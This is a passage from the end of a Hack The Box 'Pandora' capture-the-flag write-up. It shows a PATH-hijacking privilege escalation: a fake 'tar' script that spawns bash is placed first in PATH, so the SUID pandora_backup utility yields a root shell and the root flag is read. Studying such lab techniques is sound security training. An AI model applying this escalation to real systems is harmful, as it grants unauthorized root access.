matt@pandora:~$ cd /tmp
matt@pandora:/tmp$ ls
systemd-private-062d5d900bcf45168ea97553a0cb3f56-apache2.service-xIYOKi
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-logind.service-jawnUh
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-resolved.service-Rdzmth
systemd-private-062d5d900bcf45168ea97553a0cb3f56-systemd-timesyncd.service-prnntj
systemd-private-062d5d900bcf45168ea97553a0cb3f56-upower.service-aJrvDh
vmware-root_711-4256610694
matt@pandora:/tmp$ mkdir test
matt@pandora:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp$ cd test/
matt@pandora:/tmp/test$ export PATH=/tmp/test:$PATH
matt@pandora:/tmp/test$ echo $PATH
/tmp/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:/tmp/test$ touch tar
matt@pandora:/tmp/test$ vim tar
matt@pandora:/tmp/test$ cat tar
#!/bin/bash

bash
matt@pandora:/tmp/test$ chmod +x tar

35. Run the program again and read the final flag.

matt@pandora:/tmp/test$ pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:/tmp/test# id
uid=0(root) gid=1000(matt) groups=1000(matt)
root@pandora:/tmp/test# cat /root/root.txt
42d658b2326590f95f19fbceb1aab99f
root@pandora:/tmp/test#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/423


Pandora-htb-writeup
https://sh1yan.top/2023/12/27/Pandora-htb-writeup/
Author: shiyan
Published: 27 December 2023
License